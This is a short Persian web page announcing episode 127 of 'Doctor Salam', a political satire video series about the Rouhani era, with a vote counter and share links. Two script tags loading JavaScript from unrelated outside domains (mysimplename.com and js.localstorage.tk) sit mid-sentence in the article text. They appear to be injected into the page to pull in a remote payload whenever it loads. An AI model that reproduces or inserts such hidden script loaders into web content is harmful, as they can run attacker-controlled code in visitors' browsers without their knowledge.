فیلم طنز/ دکتر سلام ۱۲۷


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>صد و بیست و هفتمین قسمت از طنز سیاسی «دکتر سلام» ویژه دوران روحانی مچکریم منتشر شد.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
1

- 
0

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر